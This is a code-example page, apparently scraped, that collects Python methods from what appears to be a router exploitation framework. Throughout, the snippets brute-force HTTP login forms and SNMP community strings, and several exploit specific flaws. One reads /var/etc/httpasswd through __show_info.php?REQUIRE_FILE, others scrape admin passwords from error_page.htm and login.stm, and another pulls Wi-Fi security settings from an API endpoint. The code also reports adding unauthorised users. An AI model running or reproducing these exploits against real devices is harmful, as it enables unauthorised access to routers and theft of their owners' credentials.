            else:
                print_error("Exploid failed - user could not be added")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
コード例 #45
0
    def attack(self):
        url = sanitize_url("{}:{}{}".format(self.target, self.port,
                                            self.get_form_path()))

        try:
            requests.get(url, verify=False)
        except (requests.exceptions.MissingSchema,
                requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        # authentication type
        if self.form == 'auto':
            form_data = self.detect_form()

            if form_data is None:
                print_error("Could not detect form")
                return

            (form_action, self.data) = form_data
            if form_action:
                self.path = form_action
        else:
            self.data = self.form

        print_status("Using following data: ", self.data)

        # invalid authentication
        self.invalid_auth()

        # running threads
        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #46
0
    def attack(self):
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path()))

        try:
            requests.get(url, verify=False)
        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        # authentication type
        if self.form == 'auto':
            form_data = self.detect_form()

            if form_data is None:
                print_error("Could not detect form")
                return

            (form_action, self.data) = form_data
            if form_action:
                self.path = form_action
        else:
            self.data = self.form

        print_status("Using following data: ", self.data)

        # invalid authentication
        self.invalid_auth()

        # running threads
        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #47
0
    def run(self):
        url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)

        if len(creds):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")
コード例 #48
0
    def parse_print(self, content):

        if self.action == "user_info":
            m_groups = re.match(r'(.*)UserInfo.=.([^;]*)(.*)', content, re.I | re.M)

            if m_groups and m_groups.groups > 2:
                print_table(("User Info", ), (m_groups.group(2), ))
            else:
                # Print something, in case that formats vary over models
                # maybe regex will not work and we don't want to leave
                # users without information
                print_table(("User Info", ), (content, ))

        elif self.action == "user_add":
            print_success("User {} with password {} created.".format(self.username, self.password))
コード例 #49
0
    def run(self):
        url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text)

        if len(creds):
            c = [("admin", creds[0])]
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *c)
        else:
            print_error("Credentials could not be found")
コード例 #50
0
    def run(self):
        url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", response.text)
        if len(creds):
            c = creds[0].split(":")
            creds = [(c[0], c[1])]
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")
コード例 #51
0
    def run(self):
        url = "{}:{}/error_page.htm".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", response.text)

        if len(creds):
            c = [("admin", creds[0])]
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *c)
        else:
            print_error("Credentials could not be found")
コード例 #52
0
    def run(self):
        url = "{}:{}/api/wlan/security-settings".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return False  # target is not vulnerable

        res = []
        for option in self.opts:
            regexp = "<{}>(.+?)</{}>".format(option, option)
            value = re.findall(regexp, response.text)
            if value:
                res.append((option, value[0]))

        if len(res):
            print_success("Found sensitive information!")
            print_table(("Option", "Value"), *res)
コード例 #53
0
    def run(self):
        url = "{}:{}/login.stm".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        val = re.findall('password\s?=\s?"(.+?)"', response.text)  # in some fw there are no spaces

        if len(val):
            print_success("Exploit success")
            data = [('admin', val[0])]
            headers = ("Login", "MD5 Password")
            print_table(headers, *data)

        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")
コード例 #54
0
    def run(self):
        url = "{}:{}/api/wlan/security-settings".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return False  # target is not vulnerable

        res = []
        for option in self.opts:
            regexp = "<{}>(.+?)</{}>".format(option, option)
            value = re.findall(regexp, response.text)
            if value:
                res.append((option, value[0]))

        if len(res):
            print_success("Found sensitive information!")
            print_table(("Option", "Value"), *res)
コード例 #55
0
    def run(self):
        url = sanitize_url("{}:{}/login.stm".format(self.target, self.port))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        val = re.findall('password = "******"', response.text)

        if len(val):
            print_success("Exploit success")
            data = [('admin', val[0])]
            headers = ("Login", "MD5 Password")
            print_table(headers, *data)

        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")
コード例 #56
0
    def attack(self):

        # todo: check if service is up

        if self.snmp.startswith('file://'):
            snmp = open(self.snmp[7:], 'r')
        else:
            snmp = [self.snmp]

        collection = LockedIterator(snmp)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.strings):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Community Strings")
            print_table(headers, *self.strings)
        else:
            print_error("Valid community strings not found")
コード例 #57
0
    def run(self):
        self.credentials = []
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))

        try:
            requests.get(url, verify=False)
        except (requests.exceptions.MissingSchema,
                requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        # authentication type
        if self.form == 'auto':
            self.data = self.detect_form()

            if self.data is None:
                print_error("Could not detect form")
                return
        else:
            self.data = self.form

        print_status("Using following data: ", self.data)

        # invalid authentication
        self.invalid_auth()

        # running threads
        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")